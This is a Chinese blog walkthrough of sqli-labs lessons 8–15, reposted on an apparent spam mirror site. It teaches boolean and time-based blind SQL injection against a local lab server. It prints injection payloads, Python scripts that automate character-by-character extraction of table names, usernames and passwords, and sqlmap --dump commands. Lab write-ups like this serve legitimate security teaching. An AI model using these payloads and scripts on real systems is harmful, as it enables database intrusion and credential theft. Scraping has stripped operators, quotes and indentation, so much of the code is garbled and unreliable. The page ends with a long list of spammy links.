当前位置: 首页 > news >正文

国外调色网站专业建设网站

news 2025/10/23 1:10:18
国外调色网站,专业建设网站,网站开发的软件环境,建设旅游网站的目标less8 and 11-- 12 发现存在注入点 接下来我们会接着用联合查询 和以往的题目不一样没显错位#xff0c;也就是没有报错的内容#xff0c;尝试用盲注 布尔型 length#xff08;#xff09;返回长度 substr#xff08;#xff09;截取字符串#xff08;语法substr1-- 12 发现存在注入点 接下来我们会接着用联合查询 和以往的题目不一样没显错位也就是没有报错的内容尝试用盲注 布尔型 length返回长度 substr截取字符串语法substrstrposlen ascii返回字符的ASCII码也就是将字符变成数字 时间型 sleep将程序挂起一段时间为多少 if(expr1,expr2,expr3)判断语句如果第一个语句正确就执行第二个语句如果错误执行第三个语句。 ?id1 and (length(database()))8--      页面正常 判断之后发现长度是等于8的 猜解数据库的长度 id1 and (ascii(substr(database(),1,1)))115#     返回正常第一位是s 第一个1代表的是位置第二个1代表的是个数也就是说第一个的第一位。 id1 and (ascii(substr(database(),2,1)))101#     返回正常第二位是e 也就是判断将截取下来的字符进行ASCII编码是否等于对应的数字 猜解表名 id1 and(ascii(substr(select table_name from information_schema.table where table_schemadatabase() limit 0,1),1,1)))101-- limit和substr不一样limit是从0开始的 猜字段 id1 and(ascii(substr(select cloumn_name from information_schema.cloumns where table_nameemails limit 0,1),1,1)))105--  返回正常说明emails表中的列名称第一位是i这样下去就可以了 我们也可以使用脚本 第一种 import requests import stringurl http://127.0.0.1/sql/Less-8/def make_payload(query):return url ?id querydef make_request(payload):res requests.get(payload)return You are in........... in res.text# 猜解数据库长度 print([] 正在猜解数据库长度......) db_name_len 0 for i in range(31):payload make_payload(1and length(database())%d-- % i)if make_request(payload):db_name_len iprint(数据库长度为:, db_name_len)break else:print(error!)# 猜解数据库名字 print([] 正在猜解数据库名字......) db_name for i in range(1, db_name_len 1):for k in string.ascii_lowercase:payload make_payload(1and substr(database(),%d,1)%s-- % (i, k))if make_request(payload):db_name kbreak print(数据库为:, db_name)# 猜解表的数量 print([] 正在猜解表的数量......) tab_num 0 while True:payload make_payload(1and (select count(table_name) from information_schema.tables where table_schemasecurity)%d-- % tab_num)if make_request(payload):print(%s数据库共有%d张表 % (db_name, tab_num))breakelse:tab_num 1# 猜解表名 print([] 开始猜解表名......) for i in range(1, tab_num 1):tab_len 0while True:payload make_payload(1and (select length(table_name) from information_schema.tables where table_schemasecurity limit %d,1)%d-- % (i-1, tab_len))if make_request(payload):breaktab_len 1if tab_len 30:print(error!)breaktab_name for j in range(1, tab_len 1):for m in string.ascii_lowercase:payload make_payload(1and substr((select table_name from information_schema.tables where table_schemasecurity limit %d,1),%d,1)%s-- % (i-1, j, m))if make_request(payload):tab_name mbreakprint([-] 第%d张表名为: %s % (i, tab_name))# 猜解表下字段dump_num 0while True:payload make_payload(1and (select count(column_name) from information_schema.columns where table_name%s)%d-- % (tab_name, dump_num))if make_request(payload):print(%s表下有%d个字段 % (tab_name, dump_num))breakdump_num 1for a in range(1, dump_num 1):dump_len 0while True:payload make_payload(1and (select length(column_name) from information_schema.columns where table_name%s limit %d,1)%d-- % (tab_name, a-1, dump_len))if make_request(payload):breakdump_len 1if dump_len 30:print(error!!)breakdump_name for i in range(1, dump_len 1):for j in (string.ascii_lowercase _-):payload make_payload(1and substr((select column_name from information_schema.columns where table_name%s limit %d,1),%d,1)%s-- % (tab_name, a-1, i, j))if make_request(payload):dump_name jbreakprint(dump_name)# 猜解users表下的username print([] 开始猜解users表下的username......) usn_num 0 char qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_- while True:payload make_payload(1and (select count(username) from security.users)%d-- % usn_num)if make_request(payload):breakusn_num 1 for i in range(1, usn_num 1):usn_len 0while True:payload make_payload(1and (select length(username) from security.users limit %d,1)%d-- % (i-1, usn_len))if make_request(payload):breakusn_len 1usr_name for k in range(1, usn_len 1):for m in char:payload make_payload(1and substr((select username from security.users limit %d,1),%d,1)%s-- % (i-1, k, m))if make_request(payload):usr_name mbreakprint(usr_name)# 猜解users表下的password print([] 开始猜解users表下的password......) usn_num 0 char qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-! while True:payload make_payload(1and (select count(password) from security.users)%d-- % usn_num)if make_request(payload):breakusn_num 1 for i in range(1, usn_num 1):usn_len 0while True:payload make_payload(1and (select length(password) from security.users limit %d,1)%d-- % (i-1, usn_len))if make_request(payload):breakusn_len 1usr_name for k in range(1, usn_len 1):for m in char:payload make_payload(1and substr((select password from security.users limit %d,1),%d,1)%s-- % (i-1, k, m))if make_request(payload):usr_name mbreakprint(usr_name) 我们是可以用脚本爆出来的但是需要等一会 第二种 这个先猜出个数 这个是显示具体的库名 表名和字段也是一样的 import requestsdef get_dblength(base_url): url base_url and (length(database()){0}) %23 base_num 100 for i in range(0,base_num): url1 url.format(i) print(url1) result len(requests.get(url1).text) if result base_result: print(库名长度:,i) break return i def get_dbname(base_url,db_length): dict 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz dbname url base_url and ascii(substr(database(),{0},1)){1} %23 for i in range(1,db_length1): for m in dict: m_ascii ord(m) url2 url.format(i,m_ascii) result requests.get(url2) if len(result.text) base_result: dbname m print(dbname) break print(库名:,dbname) def get_table_length(): url base_url and (select length(table_name) from information_schema.tables where table_schema database() limit {0},1){1}%23 for i in range(0,20): url1 url.format(2,i) result requests.get(url1) if base_result len(result.text): print(表名长度:,i) break return i def get_table_name(table_length): dict 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz table_name url base_url and ascii(substr((select table_name from information_schema.tables where table_schema database() limit {0},1),{1},1)){2} %23 for i in range(1,table_length 1): for m in dict: ascii_m ord(m) url1 url.format(2,i,ascii_m) result requests.get(url1).text if base_result len(result): table_name m print(表名:,table_name) break return table_name if __name__ __main__: base_url http://127.0.0.1/sqli-labs/Less-8/?id1 base_result len(requests.get(base_url).text) dblength get_dblength(base_url) get_dbname(base_url, dblength) get_table_length() get_table_name(7) SQLMAP 1. 基础指令 –dbs 获取库名 -D 指定库 –tables 表 sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id1 --dbs -D mysql --tables -T 指定表 –columns 跑字段 –dump 获取数据高危指令 sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id1 --dbs -D mysql -T user --dump   less9 同样是盲注 我们尝试一下11和12发现他们的页面都是一样的这里要注意的是不代表这里不存在注入上面我们提到时间盲注这也就是和上面的区别。 布尔盲注有两种页面但是时间没有只有一种页面不管对与错 时间注入和布尔盲注两种没有多大差别只不过时间盲注多了if函数和sleep()函数。if(a,sleep(10),1)如果a结果是真的那么执行sleep(10)页面延迟10秒如果a的结果是假执行1页面不延迟。通过页面时间来判断出id参数是单引号字符串。 ?id1 and if(11,sleep(5),1)-- 判断参数构造。 ?id1and if(length((select database()))9,sleep(5),1)-- 判断数据库名长度   ?id1and if(ascii(substr((select database()),1,1))115,sleep(5),1)-- 逐一判断数据库字符 ?id1and if(length((select group_concat(table_name) from information_schema.tables where table_schemadatabase()))13,sleep(5),1)-- 判断所有表名长度   ?id1and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemadatabase()),1,1))99,sleep(5),1)-- 逐一判断表名 ?id1and if(length((select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers))20,sleep(5),1)-- 判断所有字段名的长度   ?id1and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers),1,1))99,sleep(5),1)-- 逐一判断字段名。 ?id1 and if(length((select group_concat(username,password) from users))109,sleep(5),1)-- 判断字段内容长度    ?id1 and if(ascii(substr((select group_concat(username,password) from users),1,1))50,sleep(5),1)-- 逐一检测内容。 下面是两个脚本 # -*- coding: utf-8 -*- import requests import time url http://127.0.0.1/sqli/Less-8/?id1 def check(payload):url_new url payloadtime_start time.time()content requests.get(urlurl_new)time_end time.time()if time_end - time_start 5:return 1 result s r0123456789abcdefghijklmnopqrstuvwxyz for i in xrange(1,100):for c in s:payload and if(substr(database(),%d,1)%c,sleep(5),1)-- % (i,c)if check(payload):result cbreakprint result # -*- coding: utf-8 -*- import requests import time url http://127.0.0.1/sqli/Less-8/?id1 def check(payload):url_new url payloadtime_start time.time()content requests.get(urlurl_new)time_end time.time()if time_end - time_start 5:return 1 result panduan ll0 s r0123456789abcdefghijklmnopqrstuvwxyz for i in xrange(1,100):for c in s:payload and if(substr((select table_name from information_schema.tables where table_schema0x7365637572697479 limit 1,1),%d,1)%c,sleep(5),1)-- % (i,c)if check(payload):result cbreakif lllen(result):print table_name: resultend raw_input(-------------)ll len(result)print result 第十关和第九关差不多只是把单引号换成双引号 less11和less12 可以发现页面就发生变化了是账户登录页面。那么注入点就在输入框里面。前十关使用的是get请求参数都体现在url上面而从十一关开始是post请求参数是在表单里面。我们可以直接在输入框进行注入就行 1112 less13 十三关和十二关差不多只需要将双引号换成单引号 less14 十四关和十一关差不多只需要将单引号换成双引号 less15 这关和前面的十一关有点像没有显示报错信息这就是明显的布尔盲注。因为还有错误页面和正确页面进行参考 现在就可以判断是单引号的闭合注入了根据页面来看是布尔盲注 套路还是走一下 先猜解出数据库 判断数据库的长度是否是大于5的最终发现是登录成功的 1 or length(database())5# 看看大于8吗 最后发现是不大于8的 判断大于m吗 1 or substr(database(),1,1)m# 看看s 说明第一个字母在m到s之间试了一下是等于s的就直接猜一下,发现是可以的 1 or substr(database(),1,8)security# 后面接着看表看看表的数量有多少如果多的话就增加工作量少的话就可以加快速度 1 or (select count(table_name) from information_schema.tables where table_schemadatabase())5# 报错说明表的数量是小于等于5的还好不是很多 第一张表的长度大于5有点多了.....  但是大于6会报错也就是等于6 1 or length((select table_name from information_schema.tables where table_schemadatabase() limit 0,1))5# 通过以上方法 得到第一个表名长6第二个表名长8第三个表名长6第四个长度表名长5 开始测 1 or mid((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1,1)m# 字符处理函数功能举例重点 concat()没有分隔符地连接字符串select concat(c1,c2) from xxx重点 concat_ws()指定分隔符地连接字符串select concat_ws(:,c1,c2) from xxx重点 group_concat()以逗号分隔某列/组的数据select group_concat(c1,c2) from xxxload_file()读取服务器文件select loadfile(/tmp/a.txt)into outfile写入文件到服务器select xxxx into outfile /tmp/a.txtascii()字符串的ASCII代码值select ascii(a)ord()返回字符串第一个字符的ASCII值select ord(abc)char()返回ASCII值对应的字符串select char(97)mid()返回一个字符串的一部分select mid(abcde,1,1)substr()返回一个字符串的一部分select substr(abcde,1,1)length()返回字符串的长度select length(abc)left()返回字符串最左面几个字符select left(mysql,2)floor()返回小于或等于X的最大整数select floor(5.1)rand()返回0-1间的一个随机数select rand()if()三目运算select if(12,A,B)strcmp()比较字符串ASCII大小select strcmp(c,b)ifnull()参数1为不null则返回参数1,否则参数2select ifnull(null,2) 第一张表的第一个字母是在a到m之间的,猜了是e 1 or mid((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1,1)e# 所以这个要不断的去试才能试出来第四个表为users 看看字段 1 or length((select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 0,1))5# 根据结果要爆的字段数要小于5 字段长度 1 or length((select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 0,1))5# 根据上面的方式不断去猜解   知道username下面的也是接着走 判断username第一条记录长度 1 or length((select username from users limit 0,1))5#
文章转载自:
http://www.morning.dnmwl.cn.gov.cn.dnmwl.cn
http://www.morning.qnbgk.cn.gov.cn.qnbgk.cn
http://www.morning.nqfxq.cn.gov.cn.nqfxq.cn
http://www.morning.gskzy.cn.gov.cn.gskzy.cn
http://www.morning.nzqmw.cn.gov.cn.nzqmw.cn
http://www.morning.ymwny.cn.gov.cn.ymwny.cn
http://www.morning.wkmyt.cn.gov.cn.wkmyt.cn
http://www.morning.yccnj.cn.gov.cn.yccnj.cn
http://www.morning.xcdph.cn.gov.cn.xcdph.cn
http://www.morning.sfgzx.cn.gov.cn.sfgzx.cn
http://www.morning.xdnhw.cn.gov.cn.xdnhw.cn
http://www.morning.jtkfm.cn.gov.cn.jtkfm.cn
http://www.morning.gl-group.cn.gov.cn.gl-group.cn
http://www.morning.lizpw.com.gov.cn.lizpw.com
http://www.morning.bwkzn.cn.gov.cn.bwkzn.cn
http://www.morning.zlrrj.cn.gov.cn.zlrrj.cn
http://www.morning.mnkz.cn.gov.cn.mnkz.cn
http://www.morning.wbllx.cn.gov.cn.wbllx.cn
http://www.morning.klcdt.cn.gov.cn.klcdt.cn
http://www.morning.jwbfj.cn.gov.cn.jwbfj.cn
http://www.morning.cypln.cn.gov.cn.cypln.cn
http://www.morning.qlckc.cn.gov.cn.qlckc.cn
http://www.morning.kfstq.cn.gov.cn.kfstq.cn
http://www.morning.rkjb.cn.gov.cn.rkjb.cn
http://www.morning.lyrgp.cn.gov.cn.lyrgp.cn
http://www.morning.yfpnl.cn.gov.cn.yfpnl.cn
http://www.morning.tbqxh.cn.gov.cn.tbqxh.cn
http://www.morning.hympq.cn.gov.cn.hympq.cn
http://www.morning.fndmk.cn.gov.cn.fndmk.cn
http://www.morning.sfgtp.cn.gov.cn.sfgtp.cn
http://www.morning.wyppp.cn.gov.cn.wyppp.cn
http://www.morning.lmmkf.cn.gov.cn.lmmkf.cn
http://www.morning.hjjhjhj.com.gov.cn.hjjhjhj.com
http://www.morning.lgpzq.cn.gov.cn.lgpzq.cn
http://www.morning.qcsbs.cn.gov.cn.qcsbs.cn
http://www.morning.gcrlb.cn.gov.cn.gcrlb.cn
http://www.morning.zzjpy.cn.gov.cn.zzjpy.cn
http://www.morning.bhpsz.cn.gov.cn.bhpsz.cn
http://www.morning.sfwd.cn.gov.cn.sfwd.cn
http://www.morning.bpmtq.cn.gov.cn.bpmtq.cn
http://www.morning.zpyxl.cn.gov.cn.zpyxl.cn
http://www.morning.gkjyg.cn.gov.cn.gkjyg.cn
http://www.morning.slwfy.cn.gov.cn.slwfy.cn
http://www.morning.yrrnx.cn.gov.cn.yrrnx.cn
http://www.morning.yrbqy.cn.gov.cn.yrbqy.cn
http://www.morning.rzbgn.cn.gov.cn.rzbgn.cn
http://www.morning.lmqfq.cn.gov.cn.lmqfq.cn
http://www.morning.ymmjx.cn.gov.cn.ymmjx.cn
http://www.morning.xhgxd.cn.gov.cn.xhgxd.cn
http://www.morning.gczqt.cn.gov.cn.gczqt.cn
http://www.morning.rsdm.cn.gov.cn.rsdm.cn
http://www.morning.sphft.cn.gov.cn.sphft.cn
http://www.morning.rbzht.cn.gov.cn.rbzht.cn
http://www.morning.tzcr.cn.gov.cn.tzcr.cn
http://www.morning.sjqml.cn.gov.cn.sjqml.cn
http://www.morning.wlgpz.cn.gov.cn.wlgpz.cn
http://www.morning.xbkcr.cn.gov.cn.xbkcr.cn
http://www.morning.srbfp.cn.gov.cn.srbfp.cn
http://www.morning.gxhqt.cn.gov.cn.gxhqt.cn
http://www.morning.cokcb.cn.gov.cn.cokcb.cn
http://www.morning.fpczq.cn.gov.cn.fpczq.cn
http://www.morning.zztkt.cn.gov.cn.zztkt.cn
http://www.morning.qgghj.cn.gov.cn.qgghj.cn
http://www.morning.xiaobaixinyong.cn.gov.cn.xiaobaixinyong.cn
http://www.morning.crsnb.cn.gov.cn.crsnb.cn
http://www.morning.tgts.cn.gov.cn.tgts.cn
http://www.morning.plydc.cn.gov.cn.plydc.cn
http://www.morning.yggwn.cn.gov.cn.yggwn.cn
http://www.morning.kcsx.cn.gov.cn.kcsx.cn
http://www.morning.nlmm.cn.gov.cn.nlmm.cn
http://www.morning.lkgqb.cn.gov.cn.lkgqb.cn
http://www.morning.hpcpp.cn.gov.cn.hpcpp.cn
http://www.morning.hffpy.cn.gov.cn.hffpy.cn
http://www.morning.lqtwb.cn.gov.cn.lqtwb.cn
http://www.morning.zmyzt.cn.gov.cn.zmyzt.cn
http://www.morning.kwdfn.cn.gov.cn.kwdfn.cn
http://www.morning.lgtcg.cn.gov.cn.lgtcg.cn
http://www.morning.gglhj.cn.gov.cn.gglhj.cn
http://www.morning.xkwyk.cn.gov.cn.xkwyk.cn
http://www.morning.enjoinfo.cn.gov.cn.enjoinfo.cn
http://www.tj-hxxt.cn/news/241163.html

相关文章:

  • 德州哪家网站建设好网站建设ui设计公司
  • 苏通建设集团有限公司网站网站推广服务网站连锁
  • 石家庄市高新区建设局网站jsp网站建设项目实战电子版
  • 域名注册哪个网站好程序员自己做项目的网站
  • 淘宝客可道cms网站建设个人简单网页制作
  • 做网站有哪些故城网站建设
  • jsp网站开发教学视频移动路由器做网站服务器
  • 咸阳网站制作建设汤唯梁朝伟做的视频网站
  • 企业网站php模版wordpress建企业网站设置
  • 西安网站快速排名提升信誉好的微网站建设
  • dw建设网站的代码模板下载秦皇岛网站制作多少钱
  • 长宁区网站制作设计湛江专业的建站软件
  • 网站建设案例 杭州远大企业网站开发的功能
  • 郴州网站建设网站养老院网站开发背景
  • 网站案例网站建设沈阳网站制作费用
  • 上海源码网站建设公司深圳市住房和建设局地址
  • 登封 网站建设建设 公司 网站 请示
  • 网站的侧边栏怎么做泉州网站制作网页
  • 网站域龄查询魅力潍坊网页制作
  • 课桌公司网站建设哪里建设网站最好
  • 公司开发个网站怎么做wordpress主题的使用教程
  • wap免费建站广州企业年报网上申报入口
  • 网站建设seo基本要求搜索引擎优化seo专员
  • 付费小说网站建设湘潭seo公司
  • 什么网站做海报赚钱天津网站建立
  • 忘记网站管理员密码个人网站备案麻烦吗
  • 南阳网站排名优化费用短视频动画制作
  • 自己在家怎么做网站服务器农村电商c2c模式
  • 深圳制作公司网站企业信息查询网站查询
  • 去国外网站开发客户中的contact us 没有邮箱西安的互联网营销公司